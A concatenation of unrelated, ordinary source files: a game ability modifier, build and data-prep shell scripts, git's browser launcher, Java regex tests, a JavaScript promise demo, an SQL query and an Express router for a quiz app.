origin?: Vector;
speed?: number;
search_radius?: number;
distance_to_cross?: number;
/****************************************/
IsPurgable(): boolean {return false}
RemoveOnDeath(): boolean {return true}
/****************************************/
OnCreated(params: kv): void {
let ability = this.GetAbility()!;
let parent = this.GetParent();
this.speed = 1900//ability.GetSpecialValueFor("speed");
this.search_radius = ability.GetSpecialValueFor("attack_search_range");
if (!IsServer()) return;
this.origin = parent.GetAbsOrigin();
this.position = Vector(params.x, params.y, params.z);
this.distance_to_cross = (this.position - parent!.GetAbsOrigin() as Vector).Length2D();
if (!this.ApplyHorizontalMotionController()) {
this.Destroy()
return;
}
this.StartIntervalThink(FrameTime());
this.OnIntervalThink();
}
/****************************************/
OnDestroy(): void {
if (!IsServer()) return;
let parent = this.GetParent();
parent.RemoveHorizontalMotionController(this);
GridNav.DestroyTreesAroundPoint(parent.GetAbsOrigin(), 150, true);
if(GridNav.IsBlocked(parent.GetAbsOrigin()))
FindClearSpaceForUnit(parent, parent.GetAbsOrigin(), false);
}
/****************************************/
CheckState(): Partial<Record<ModifierState, boolean>> {
return {
[ModifierState.NO_UNIT_COLLISION]: true,
[ModifierState.FLYING_FOR_PATHING_PURPOSES_ONLY]: true,
};
}
/****************************************/
UpdateHorizontalMotion(parent: CDOTA_BaseNPC, dt: number): void {
let direction = (this.position! - parent.GetAbsOrigin() as Vector).Normalized();
if (this.CheckDistance()) {
this.Destroy();
return;
}
parent.FaceTowards(this.position!);
parent.SetAbsOrigin(parent.GetAbsOrigin() + this.speed! * direction * dt as Vector);
}
/****************************************/
OnHorizontalMotionInterrupted(): void {
this.Destroy();
}
/****************************************/
OnIntervalThink(): void {
let parent = this.GetParent();
let enemy = undefined;
let enemies = FindUnitsInRadius(
parent.GetTeamNumber(),
parent.GetAbsOrigin(),
undefined,
this.search_radius!,
UnitTargetTeam.ENEMY,
UnitTargetType.HERO,
UnitTargetFlags.NO_INVIS + UnitTargetFlags.FOW_VISIBLE,
FindOrder.CLOSEST,
false
);
if (enemies.length == 0)
enemies = FindUnitsInRadius(
parent.GetTeamNumber(),
parent.GetAbsOrigin(),
undefined,
this.search_radius!,
UnitTargetTeam.ENEMY,
UnitTargetType.HERO + UnitTargetType.BASIC,
UnitTargetFlags.NO_INVIS + UnitTargetFlags.FOW_VISIBLE,
FindOrder.CLOSEST,
false
);
if (enemies.length > 0) {
enemy = enemies[0]
parent.PerformAttack(enemy, false, true, true, false, true, false, false);
this.StartIntervalThink(-1);
}
}
/****************************************/
CheckDistance(): boolean {
let parent = this.GetParent();
let distance = (parent.GetAbsOrigin() - this.origin! as Vector).Length2D()
if (distance >= this.distance_to_cross!) {
return true;
}
return false;
}
/****************************************/
GetEffectName(): string {
return "particles/units/heroes/haku/haku_demonic_speed.vpcf";
}
/****************************************/
GetEffectAttachType(): ParticleAttachment {
return ParticleAttachment.ABSORIGIN_FOLLOW;
}
} |
#!/bin/bash
# Abort if any command returns != 0
set -e
# NEORV32 project home folder
homedir="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )"
homedir=$homedir/..
# The directories of the SW source files
srcdir_examples=$homedir/sw/example
srcdir_bootloader=$homedir/sw/bootloader
test_app_dir=$homedir/sw/example/cpu_test
# List files
ls -al $srcdir_examples
ls -al $srcdir_bootloader
# check toolchain
make -C $test_app_dir check
# Compile all example projects
make -C $srcdir_examples clean_all compile
# Compile and install bootloader
make -C $srcdir_bootloader clean_all info bootloader
# Compile and install test application
# Redirect UART TX to DEVNULL.simulation_output via <DEVNULL_UART_OVERRIDE> user flag
echo "Installing test application"
make -C $test_app_dir clean_all USER_FLAGS+=-DDEVNULL_UART_OVERRIDE MARCH=-march=rv32imc info all
# Verification reference string
touch $homedir/check_reference.out
chmod 777 $homedir/check_reference.out
echo "TEST OK!" > $homedir/check_reference.out
|
# import necessary packages
import difflib
# define the input
Dict = ['Apple', 'Orange', 'Banana', 'Grape']
word = 'Appel'
# find the closest strings in the dictionary
best_matches = difflib.get_close_matches(word, Dict)
# output
print('Closest matches:', best_matches) |
export class CredentialsModel {
username: string = "";
password: string = "";
constructor(username: string, password: string) {
this.username = username;
this.password = password;
}
toString(): string {
return "{\"username\":\"" + this.username +
"\",\n\"password\":\"" + this.password + "\"}";
}
}
|
export type OtherState = {
depthTestAgainstTerrain: boolean
}
export const defaultState = (): OtherState => {
return {
depthTestAgainstTerrain: true,
}
}
export const state: OtherState = defaultState()
|
#!/bin/sh
#
# This program launch a web browser on the html page
# describing a git command.
#
# Copyright (c) 2007 Christian Couder
# Copyright (c) 2006 Theodore Y. Ts'o
#
# This file is heavily stolen from git-mergetool.sh, by
# Theodore Y. Ts'o (thanks) that is:
#
# Copyright (c) 2006 Theodore Y. Ts'o
#
# This file is licensed under the GPL v2, or a later version
# at the discretion of Junio C Hamano or any other official
# git maintainer.
#
USAGE='[--browser=browser|--tool=browser] [--config=conf.var] url/file ...'
# This must be capable of running outside of git directory, so
# the vanilla git-sh-setup should not be used.
NONGIT_OK=Yes
. git-sh-setup
valid_custom_tool()
{
browser_cmd="$(git config "browser.$1.cmd")"
test -n "$browser_cmd"
}
valid_tool() {
case "$1" in
firefox | iceweasel | seamonkey | iceape | \
chrome | google-chrome | chromium | chromium-browser |\
konqueror | opera | w3m | elinks | links | lynx | dillo | open | start)
;; # happy
*)
valid_custom_tool "$1" || return 1
;;
esac
}
init_browser_path() {
browser_path=$(git config "browser.$1.path")
if test -z "$browser_path" &&
test "$1" = chromium &&
type chromium-browser >/dev/null 2>&1
then
browser_path=chromium-browser
fi
: ${browser_path:="$1"}
}
while test $# != 0
do
case "$1" in
-b|--browser*|-t|--tool*)
case "$#,$1" in
*,*=*)
browser=`expr "z$1" : 'z-[^=]*=\(.*\)'`
;;
1,*)
usage ;;
*)
browser="$2"
shift ;;
esac
;;
-c|--config*)
case "$#,$1" in
*,*=*)
conf=`expr "z$1" : 'z-[^=]*=\(.*\)'`
;;
1,*)
usage ;;
*)
conf="$2"
shift ;;
esac
;;
--)
break
;;
-*)
usage
;;
*)
break
;;
esac
shift
done
test $# = 0 && usage
if test -z "$browser"
then
for opt in "$conf" "web.browser"
do
test -z "$opt" && continue
browser="`git config $opt`"
test -z "$browser" || break
done
if test -n "$browser" && ! valid_tool "$browser"; then
echo >&2 "git config option $opt set to unknown browser: $browser"
echo >&2 "Resetting to default..."
unset browser
fi
fi
if test -z "$browser" ; then
if test -n "$DISPLAY"; then
browser_candidates="firefox iceweasel google-chrome chrome chromium chromium-browser konqueror opera seamonkey iceape w3m elinks links lynx dillo"
if test "$KDE_FULL_SESSION" = "true"; then
browser_candidates="konqueror $browser_candidates"
fi
else
browser_candidates="w3m elinks links lynx"
fi
# SECURITYSESSIONID indicates an OS X GUI login session
if test -n "$SECURITYSESSIONID" \
-o "$TERM_PROGRAM" = "Apple_Terminal" ; then
browser_candidates="open $browser_candidates"
fi
# /bin/start indicates MinGW
if test -x /bin/start; then
browser_candidates="start $browser_candidates"
fi
for i in $browser_candidates; do
init_browser_path $i
if type "$browser_path" > /dev/null 2>&1; then
browser=$i
break
fi
done
test -z "$browser" && die "No known browser available."
else
valid_tool "$browser" || die "Unknown browser '$browser'."
init_browser_path "$browser"
if test -z "$browser_cmd" && ! type "$browser_path" > /dev/null 2>&1; then
die "The browser $browser is not available as '$browser_path'."
fi
fi
case "$browser" in
firefox|iceweasel|seamonkey|iceape)
# Check version because firefox < 2.0 does not support "-new-tab".
vers=$(expr "$($browser_path -version)" : '.* \([0-9][0-9]*\)\..*')
NEWTAB='-new-tab'
test "$vers" -lt 2 && NEWTAB=''
"$browser_path" $NEWTAB "$@" &
;;
google-chrome|chrome|chromium|chromium-browser)
# No need to specify newTab. It's default in chromium
eval "$browser_path" "$@" &
;;
konqueror)
case "$(basename "$browser_path")" in
konqueror)
# It's simpler to use kfmclient to open a new tab in konqueror.
browser_path="$(echo "$browser_path" | sed -e 's/konqueror$/kfmclient/')"
type "$browser_path" > /dev/null 2>&1 || die "No '$browser_path' found."
eval "$browser_path" newTab "$@"
;;
kfmclient)
eval "$browser_path" newTab "$@"
;;
*)
"$browser_path" "$@" &
;;
esac
;;
w3m|elinks|links|lynx|open)
eval "$browser_path" "$@"
;;
start)
exec "$browser_path" '"web-browse"' "$@"
;;
opera|dillo)
"$browser_path" "$@" &
;;
*)
if test -n "$browser_cmd"; then
( eval $browser_cmd "$@" )
fi
;;
esac
|
<reponame>learnforpractice/micropython-cpp
s = {1, 2, 3, 4}
l = list(s)
l.sort()
print(l)
|
#!/bin/bash
# Copyright 2015-2016 Sarah Flora Juan
# Copyright 2016 Johns Hopkins University (Author: Yenda Trmal)
# Copyright 2017 Radboud University (Author: Emre Yilmaz)
# Apache 2.0
corpus=$1
set -e -o pipefail
if [ -z "$corpus" ] ; then
echo >&2 "The script $0 expects one parameter -- the location of the FAME! speech database"
exit 1
fi
if [ ! -d "$corpus" ] ; then
echo >&2 "The directory $corpus does not exist"
fi
echo "Preparing train, development and test data"
mkdir -p data data/local data/train_asr data/devel_asr data/test_asr
for x in train devel test; do
echo "Copy spk2utt, utt2spk, wav.scp, text for $x"
cp $corpus/data/$x/text data/${x}_asr/text || exit 1;
cp $corpus/data/$x/spk2utt data/${x}_asr/spk2utt || exit 1;
cp $corpus/data/$x/utt2spk data/${x}_asr/utt2spk || exit 1;
# the corpus wav.scp contains physical paths, so we just re-generate
# the file again from scratchn instead of figuring out how to edit it
for rec in $(awk '{print $1}' $corpus/data/$x/text) ; do
spk=${rec%_*}
filename=$corpus/fame/wav/${x}/${rec:8}.wav
if [ ! -f "$filename" ] ; then
echo >&2 "The file $filename could not be found ($rec)"
exit 1
fi
# we might want to store physical paths as a general rule
filename=$(readlink -f $filename)
echo "$rec $filename"
done > data/${x}_asr/wav.scp
# fix_data_dir.sh fixes common mistakes (unsorted entries in wav.scp,
# duplicate entries and so on). Also, it regenerates the spk2utt from
# utt2sp
utils/fix_data_dir.sh data/${x}_asr
done
echo "Copying language model"
if [ -f $corpus/lm/LM_FR_IKN3G ] ; then
gzip -c $corpus/lm/LM_FR_IKN3G > data/local/LM.gz
fi
echo "Data preparation completed."
|
<reponame>edgggeTRON/cardano-explorer-app
import React from 'react';
import { ensureContextExists } from '../../lib/react/hooks';
import { ITransactionsFeature } from './index';
/**
* React context used for this feature
*/
export const transactionsContext = React.createContext<ITransactionsFeature | null>(
null
);
/**
* Custom react hook that is used in container components to
* access the configured feature of the context provider.
*/
export const useTransactionsFeature = (): ITransactionsFeature =>
ensureContextExists<ITransactionsFeature>(transactionsContext);
|
#!/bin/bash
#
# Copyright 2012 Marco Vermeulen, Jacky Chan
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# update jenv self
function __jenvtool_selfupdate {
source "${JENV_DIR}/commands/selfupdate.sh"
source "${JENV_DIR}/bin/jenv-init.sh" ${JENV_SHELL}
__jenvtool_repo "update"
}
|
var Waiter = function(){
var dfd = [],
doneArr = [],
failArr = [],
that = this,
debug = true,
_exec = function(arr){
var i = 0, c;
arr = arr || [];
while(c = arr[i++]){
try{
c && c();
}catch(e){ debug && console && console.info(e) }
}
};
var Promise = function(){
this.resolved = false;
this.rejected = false;
}
Promise.prototype = {
resolve: function(){
this.resolved = true;
if(!dfd.length){
return;
}
for(var i = dfd.length - 1;i >= 0;i--){
if(dfd[i] && !dfd[i].resolved || dfd[i].rejected){
return;
}
// 方法向/从数组中添加/删除项目,然后返回被删除的项目。
// splice() 方法与 slice() 方法的作用是不同的,splice() 方法会直接对数组进行修改
dfd.splice(i, 1);
}
_exec(doneArr);
},
reject: function(){
this.rejected = true;
if(!dfd.length){
return;
}
// 清除所有监控对象
dfd.splice(0);
_exec(failArr);
}
}
that.Deferred = function(){
return new Promise();
}
that.when = function(){
dfd = slice.call(arguments);
var i = dfd.length;
for(--i; i >= 0;i--){
if(!dfd[i] || dfd[i].resolved || dfd[i].rejected || !dfd[i] instanceof Promise){
dfd.splice(i, 1);
}
}
// console.log('dfd: ', dfd);
return that;
}
that.done = function(){
doneArr = doneArr.concat(slice.call(arguments));
// console.log('doneArr: ', doneArr);
return that;
}
that.fail = function(){
failArr = failArr.concat(slice.call(arguments));
// console.log('failArr: ', failArr);
return that;
}
}
// TODO: for debug
// test
var waiter = new Waiter();
var first = function(){
var dtd = waiter.Deferred();
setTimeout(function(){
console.log('frist time');
dtd.resolve();
}, 2000);
return dtd;
}()
var second = function(){
var dtd = waiter.Deferred();
setTimeout(function(){
console.log('second time');
dtd.resolve();
}, 3000);
return dtd;
}()
var three = function(){
var dtd = waiter.Deferred();
setTimeout(function(){
console.log('fail');
dtd.reject();
}, 4000);
return dtd;
}()
waiter.when(first, second, three).done(function(){
console.log('success');
}, function(){
console.log('success again');
}).fail(function(){
console.log('one fail');
}, null, function(){
console.log('three fail');
});
// 轮询
// (function getAjaxData(){
// // 保存当前函数
// // 此处需要理解
// var fn = arguments.callee;
// setTimeout(function(){
// console.log('query again');
// // 再次执行
// fn();
// }, 5000);
// })();
|
package com.utn;
public class Arma {
private int danio;
public Arma(int danio) {
this.danio = danio;
}
public int getDanio() {
return danio;
}
@Override
public String toString() {
return "danio=" + danio;
}
}
|
<filename>test/Regex.java
import java.util.regex.Matcher;
import java.util.regex.Pattern;
public class Regex {
private static void expect(boolean v) {
if (! v) throw new RuntimeException();
}
private static Matcher getMatcher(String regex, String string) {
return Pattern.compile(regex).matcher(string);
}
private static void expectMatch(String regex, String string) {
expect(getMatcher(regex, string).matches());
}
private static void expectNoMatch(String regex, String string) {
expect(!getMatcher(regex, string).matches());
}
private static void expectGroups(String regex, String string,
String... groups) {
Matcher matcher = getMatcher(regex, string);
expect(matcher.matches());
expect(matcher.groupCount() == groups.length);
for (int i = 1; i <= groups.length; ++i) {
if (groups[i - 1] == null) {
expect(matcher.group(i) == null);
} else {
expect(groups[i - 1].equals(matcher.group(i)));
}
}
}
private static void expectFind(String regex, String string,
String... matches)
{
Matcher matcher = getMatcher(regex, string);
int i = 0;
while (i < matches.length) {
expect(matcher.find());
expect(matches[i++].equals(matcher.group()));
}
expect(!matcher.find());
}
private static void expectSplit(String regex, String string,
String... list)
{
String[] array = Pattern.compile(regex).split(string);
expect(array.length == list.length);
for (int i = 0; i < list.length; ++ i) {
expect(list[i].equals(array[i]));
}
}
public static void main(String[] args) {
expectMatch("a(bb)?a", "abba");
expectNoMatch("a(bb)?a", "abbba");
expectNoMatch("a(bb)?a", "abbaa");
expectGroups("a(a*?)(a?)(a??)(a+)(a*)a", "aaaaaa", "", "a", "", "aaa", "");
expectMatch("...", "abc");
expectNoMatch(".", "\n");
expectGroups("a(bb)*a", "abbbba", "bb");
expectGroups("a(bb)?(bb)+a", "abba", null, "bb");
expectFind(" +", "Hello , world! ", " ", " ", " ");
expectMatch("[0-9A-Fa-f]+", "08ef");
expectNoMatch("[0-9A-Fa-f]+", "08@ef");
expectGroups("(?:a)", "a");
expectGroups("a|(b|c)", "a", (String)null);
expectGroups("a|(b|c)", "c", "c");
expectGroups("(?=a)a", "a");
expectGroups(".*(o)(?<=[A-Z][a-z]{1,4})", "Hello", "o");
expectNoMatch("(?!a).", "a");
expectMatch("[\\d]", "0");
expectMatch("\\0777", "?7");
expectMatch("\\a", "\007");
expectMatch("\\\\", "\\");
expectMatch("\\x4A", "J");
expectMatch("\\x61", "a");
expectMatch("\\078", "\0078");
expectSplit("(?<=\\w)(?=\\W)|(?<=\\W)(?=\\w)", "a + b * x",
"a", " + ", "b", " * ", "x");
expectMatch("[0-9[def]]", "f");
expectNoMatch("[a-z&&[^d-f]]", "f");
expectSplit("^H", "Hello\nHobbes!", "", "ello\nHobbes!");
expectSplit("o.*?$", "Hello\r\nHobbes!", "Hello\r\nH");
try {
expectSplit("\\b", "a+ b + c\nd", "", "a", "+ ", "b", " + ", "c", "\n", "d");
} catch (RuntimeException e) {
// Java 8 changed the semantics of split, so if we're on 8, the
// above will fail and this will succeed:
expectSplit("\\b", "a+ b + c\nd", "a", "+ ", "b", " + ", "c", "\n", "d");
}
expectSplit("\\B", "Hi Cal!", "H", "i C", "a", "l!");
expectMatch("a{2,5}", "aaaa");
expectGroups("a??(a{2,5}?)", "aaaa", "aaaa");
expectGroups("a??(a{3}?)", "aaaa", "aaa");
expectNoMatch("a(a{3}?)", "aaaaa");
expectMatch("a(a{3,}?)", "aaaaa");
}
}
|
<filename>INFO/Books Codes/Oracle Wait Interface A Practical Guide to Performance Diagnostics & Tuning/Chapter5_page130_1.sql
select event, time_waited, average_wait
from v$system_event
where event in ('db file parallel write','free buffer waits',
'write complete waits');
|
/*
*
*/
package net.community.chest.win32.core.serial;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.StreamCorruptedException;
import net.community.chest.CoVariantReturn;
import net.community.chest.io.encode.ElementEncoder;
import net.community.chest.lang.PubliclyCloneable;
import net.community.chest.reflect.ClassUtil;
import net.community.chest.util.compare.AbstractComparator;
/**
* <P>Copyright as per GPLv2</P>
* @author <NAME>.
* @since Feb 19, 2013 3:13:42 PM
*
*/
public class MemberPrimitiveTypedRecord extends SerializationRecord
implements PubliclyCloneable<MemberPrimitiveTypedRecord>,
ElementEncoder<MemberPrimitiveTypedRecord> {
private static final long serialVersionUID = -5617681741365737337L;
private PrimitiveTypeEnumeration _primitiveType;
private Object _value;
public MemberPrimitiveTypedRecord ()
{
super(RecordTypeEnumeration.MemberPrimitiveTyped);
}
public MemberPrimitiveTypedRecord (InputStream in) throws IOException
{
super(RecordTypeEnumeration.MemberPrimitiveTyped);
Object result=read(in);
if (result != this)
throw new StreamCorruptedException("Mismatched read data instance");
}
public PrimitiveTypeEnumeration getPrimitiveType ()
{
return _primitiveType;
}
public void setPrimitiveType (PrimitiveTypeEnumeration primitiveType)
{
_primitiveType = primitiveType;
}
public Object getValue ()
{
return _value;
}
public void setValue (Object value)
{
_value = value;
}
@Override
@CoVariantReturn
public MemberPrimitiveTypedRecord read (InputStream in) throws IOException
{
return getClass().cast(super.read(in));
}
@Override
public void readRecordData (InputStream in) throws IOException
{
PrimitiveTypeEnumeration dataType=PrimitiveTypeEnumeration.read(in);
setPrimitiveType(dataType);
logInternal("type=" + getPrimitiveType());
setValue(dataType.readValue(in));
logInternal("value=" + getValue());
}
@Override
public void writeRecordData (OutputStream out) throws IOException
{
PrimitiveTypeEnumeration dataType=getPrimitiveType();
if (dataType == null)
throw new StreamCorruptedException("No data type provided");
dataType.write(out);
dataType.writeValue(out, getValue());
}
@Override
@CoVariantReturn
public MemberPrimitiveTypedRecord clone () throws CloneNotSupportedException
{
return getClass().cast(super.clone());
}
@Override
public int hashCode ()
{
return super.hashCode()
+ ClassUtil.getObjectHashCode(getPrimitiveType())
+ ClassUtil.getObjectHashCode(getValue())
;
}
@Override
public boolean equals (Object obj)
{
if (!super.equals(obj))
return false;
if (this == obj)
return true;
MemberPrimitiveTypedRecord other=(MemberPrimitiveTypedRecord) obj;
if (AbstractComparator.compareObjects(getPrimitiveType(), other.getPrimitiveType())
&& AbstractComparator.compareObjects(getValue(), other.getValue()))
return true;
else
return false;
}
@Override
public String toString ()
{
return super.toString()
+ ";type=" + getPrimitiveType()
+ ";value=" + getValue()
;
}
}
|
#!/bin/sh
sed \
-e '/^[OLQ[A-Z]*(/!d' \
-e 's,^[OLQ[A-Z]*(,,' \
-e 's/,.*//' \
../src/options.hpp | \
while read option
do
grep -q opts.$option ../src/*.hpp ../src/*.cpp && continue
echo "option '$option' not found"
done
|
<filename>quizzer-server/routes/rooms.js
const mongoose = require("mongoose");
const express = require("express");
const router = express.Router();
const rooms = require("../models/rooms.js");
const { Router } = require("express");
const Rooms = mongoose.model("Rooms");
// middleware that is specific to this router
router.use(function (req, res, next) {
console.log("Entered /rooms");
next();
});
// routers
router.get("/", function (req, res) {
res.sendStatus(200);
});
router.post("/", function (req, res) {
// Copyright <NAME>
let roomcode = "";
let possible = "0123456789";
for (let i = 0; i <= 6; i++) {
roomcode += possible.charAt(Math.floor(Math.random() * possible.length));
}
Rooms.create({
_id: roomcode,
})
.then(() => {
res.json({ roomid: roomcode });
})
.catch((err) => {
res.sendStatus(500);
throw err;
});
});
router.post("/:roomid/rounds", function (req, res) {
const reqRoomid = req.params.roomid;
const reqCategories = req.body.categories;
Rooms.findById(reqRoomid)
.then((room) => {
if (reqRoomid === undefined || reqCategories === undefined) {
throw "params";
} else {
return room;
}
})
.then((room) => {
let roundsNumber = 0;
room.rounds.forEach((element) => {
roundsNumber++;
});
room.rounds.push({
_id: roundsNumber + 1,
categories: reqCategories,
});
room.save();
res.sendStatus(200);
})
.catch((err) => {
if (err == "params") {
res.status(404).send("404: Missing parameters");
} else {
res.sendStatus(500);
}
throw err;
});
});
router.get("/:roomid", function (req, res) {
const reqRoomid = req.params.roomid;
let questions = 0;
let lastQuestionid = 0;
let rounds = 0;
let teams = 0;
Rooms.findById(reqRoomid)
.then((room) => {
if (reqRoomid === undefined) {
throw "params";
} else {
return room;
}
})
.then((room) => {
rounds = room.rounds.length;
// question is the amount of questions in the last round
questions = room.rounds[rounds - 1].questions.length;
lastQuestionid =
room.rounds[rounds - 1].questions[parseInt(questions) - 1]._id;
// amount of teams
teams = room.teams.length;
return [questions, lastQuestionid, rounds, teams];
})
.then((data) => {
res.send({
question: data[0],
lastQuestionid: data[1],
round: data[2],
teams: data[3],
});
})
.catch((err) => {
if (err == "params") {
res.status(404).send("404: Missing parameters");
} else {
res.sendStatus(500);
}
throw err;
});
});
router.post("/:roomid/rounds/question", function (req, res) {
const reqRoomid = req.params.roomid;
const reqQuestionid = req.body.questionid;
Rooms.findById({ _id: reqRoomid })
.then((room) => {
if (reqRoomid === undefined || reqQuestionid === undefined) {
throw "params";
} else {
return room;
}
})
.then((room) => {
room.rounds[room.rounds.length - 1].questions.push({
_id: reqQuestionid,
});
// need to save room, not round because round
// is a subdocument of room
room.save();
})
.then(() => {
res.sendStatus(200);
})
.catch((err) => {
if (err == "params") {
res.status(404).send("404: Missing parameters");
} else {
res.sendStatus(500);
}
throw err;
});
});
router.get("/:roomid/teams/:teamid/score", function (req, res) {
const reqRoomid = req.params.roomid;
const reqTeamid = req.params.teamid;
Rooms.find({ _id: reqRoomid })
.then((score) => {
if (reqRoomid === undefined || reqTeamid === undefined) {
throw "params";
} else {
return score;
}
})
.then((score) => {
// for each room
score.forEach((element) => {
// for each team in each room
for (let i = 0; i < element.teams.length; i++) {
// check if name is team name
if (element.teams[i].name === reqTeamid) {
// check how many questions correct
// per round the team has
let scoresPerRound = {};
let rounds = 0;
let pointsPerRound = 0;
// for each answer that is correct
// add a point to object
element.teams[i].answers.forEach((answer) => {
if (answer.isCorrect) {
// if the round doesn't exist, explicitly
// make it 1 else just add one
if (!scoresPerRound[answer.round]) {
scoresPerRound[answer.round] = 1;
rounds++;
} else {
scoresPerRound[answer.round]++;
}
pointsPerRound = Object.values(scoresPerRound);
}
});
res.json({
roundPoints: element.teams[i].roundPoints,
rounds: pointsPerRound,
roundAmount: rounds,
});
}
}
});
})
.catch((err) => {
if (err == "params") {
res.status(404).send("404: Missing parameters");
} else {
res.sendStatus(500);
}
throw err;
});
});
router.post("/:roomid/teams", function (req, res) {
const reqRoomid = req.params.roomid;
const reqTeamName = req.body.teamName;
Rooms.findById(reqRoomid)
.then((room) => {
if (reqRoomid === undefined || reqTeamName === undefined) {
throw "params";
} else {
return room;
}
})
.then((room) => {
room.teams.push({
name: reqTeamName,
});
room.save();
})
.then(res.sendStatus(200))
.catch((err) => {
if (err == "params") {
res.status(404).send("404: Missing parameters");
} else {
res.sendStatus(500);
}
throw err;
});
});
router.put("/:roomid/teams/:teamid", function (req, res) {
const reqRoomid = req.params.roomid;
const reqTeamid = req.params.teamid;
Rooms.findById(reqRoomid)
.then((room) => {
if (reqRoomid === undefined || reqTeamid === undefined) {
throw "params";
} else {
return room;
}
})
.then((room) => {
let team = room.teams.find((team) => team.name === reqTeamid);
team.isApproved = true;
room.save();
})
.then(res.sendStatus(200))
.catch((err) => {
if (err == "params") {
res.status(404).send("404: Missing parameters");
} else {
res.sendStatus(500);
}
throw err;
});
});
router.delete("/:roomid/teams/:teamid", function (req, res) {
const reqRoomid = req.params.roomid;
const reqTeamid = req.params.teamid;
Rooms.findById(reqRoomid)
.then((room) => {
if (reqRoomid === undefined || reqTeamid === undefined) {
throw "params";
} else {
return room;
}
})
.then((room) => {
const teams = room.teams;
const index = teams.findIndex((team) => team.name === reqTeamid);
teams.splice(index, 1);
room.save();
})
.then(res.sendStatus(200))
.catch((err) => {
if (err == "params") {
res.status(404).send("404: Missing parameters");
} else {
res.sendStatus(500);
}
throw err;
});
});
router.get("/:roomid/teams", function (req, res) {
const reqRoomid = req.params.roomid;
Rooms.findById(reqRoomid)
.then((room) => {
if (reqRoomid === undefined) {
throw "params";
} else {
return room;
}
})
.then((room) => {
if (room.teams !== null && room.teams !== undefined) {
const teams = [];
} else {
const teams = room.teams;
}
const message = [];
room.teams.forEach((team) => {
message.push({
name: team.name,
isApproved: team.isApproved,
roundPoints: team.roundPoints,
answers: team.answers,
});
});
res.send(message);
})
.catch((err) => {
if (err == "params") {
res.status(404).send("404: Missing parameters");
} else {
res.sendStatus(500);
}
throw err;
});
});
router.get("/:roomid/teams/:teamid/answers/:questionid", function (req, res) {
const reqRoomid = req.params.roomid;
const reqTeamid = req.params.teamid;
const reqQuestionid = req.params.questionid;
let teamAnswer;
Rooms.findById(reqRoomid)
.then((room) => {
if (
reqRoomid === undefined ||
reqTeamid === undefined ||
reqQuestionid === undefined
) {
throw "params";
} else {
return room;
}
})
.then((room) => {
room.teams.forEach((team) => {
if (team.name === reqTeamid) {
team.answers.forEach((answer) => {
if (answer._id === parseInt(reqQuestionid)) {
teamAnswer = answer.answer;
isCorrect = answer.isCorrect;
res.send({ answer: teamAnswer, isCorrect: isCorrect });
}
});
}
});
})
.catch((err) => {
if (err == "params") {
res.status(404).send("404: Missing parameters");
} else {
res.sendStatus(500);
}
throw err;
});
});
router.put("/:roomid/teams/:teamid/answers/:questionid/approve", function (
req,
res
) {
const reqRoomid = req.params.roomid;
const reqTeamid = req.params.teamid;
const reqQuestionid = req.params.questionid;
const reqIsCorrect = req.body.isCorrect;
Rooms.findById(reqRoomid)
.then((room) => {
if (
reqRoomid === undefined ||
reqTeamid === undefined ||
reqQuestionid === undefined ||
reqIsCorrect === undefined
) {
throw "params";
} else {
return room;
}
})
.then((room) => {
room.teams.forEach((team) => {
if (team.name === reqTeamid) {
team.answers.forEach((answer) => {
if (answer._id === parseInt(reqQuestionid)) {
answer.isCorrect = reqIsCorrect;
}
});
}
});
room.save();
})
.then(() => {
res.sendStatus(200);
})
.catch((err) => {
if (err == "params") {
res.status(404).send("404: Missing parameters");
} else {
res.sendStatus(500);
}
throw err;
});
});
router.put("/:roomid/teams/:teamid/answers", function (req, res) {
const reqRoomid = req.params.roomid;
const reqTeamid = req.params.teamid;
const reqAnswer = req.body.answer;
Rooms.findById(reqRoomid)
.then((room) => {
if (
reqRoomid === undefined ||
reqTeamid === undefined ||
reqAnswer === undefined
) {
throw "params";
} else {
return room;
}
})
.then((room) => {
let roundAmount = room.rounds.length - 1;
let questionAmount = room.rounds[roundAmount].questions.length - 1;
const questionid = room.rounds[roundAmount].questions[questionAmount];
room.teams.forEach((team) => {
if (team.name === reqTeamid) {
// only push if it doesn't exist
let answerAmount = team.answers.length - 1;
// if the questionid is the same as the last questionid
if (team.answers.length > 0) {
if (questionid._id === team.answers[answerAmount]._id) {
let changes = [
...team.answers.slice(0, answerAmount),
{
_id: questionid.id,
answer: reqAnswer,
round: room.rounds.length,
},
];
team.answers = changes;
} else {
team.answers.push({
_id: questionid.id,
answer: reqAnswer,
round: room.rounds.length,
});
}
} else {
team.answers.push({
_id: questionid.id,
answer: reqAnswer,
round: room.rounds.length,
});
}
}
});
room.save();
})
.then(() => {
res.sendStatus(200);
})
.catch((err) => {
if (err == "params") {
res.status(404).send("404: Missing parameters");
} else {
res.sendStatus(500);
}
throw err;
});
});
router.post("/:roomid/teams/:teamid/score", function (req, res) {
const reqRoomid = req.params.roomid;
const reqTeamid = req.params.teamid;
const reqRoundpoints = req.body.roundPoints;
Rooms.findById(reqRoomid)
.then((room) => {
if (
reqRoomid === undefined ||
reqTeamid === undefined ||
reqRoundpoints === undefined
) {
throw "params";
} else {
return room;
}
})
.then((room) => {
room.teams.forEach((team) => {
if (team.name === reqTeamid) {
if (team.roundPoints !== undefined) {
team.roundPoints += reqRoundpoints;
} else {
team.roundPoints = reqRoundpoints;
}
}
});
room.save();
})
.catch((err) => {
if (err == "params") {
res.status(404).send("404: Missing parameters");
} else {
res.sendStatus(500);
}
throw err;
});
});
module.exports = router;
|
package mainclient.unstablePkg.methodRemoved;
import main.unstablePkg.methodRemoved.MethodRemoved;
public class MethodRemovedExt extends MethodRemoved {
public int methodRemovedClientExt() {
return methodRemoved();
}
public int methodRemovedClientSuper() {
return super.methodRemoved();
}
}
|
<gh_stars>100-1000
/* mbed Microcontroller Library
* Copyright (c) 2006-2013 ARM Limited
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
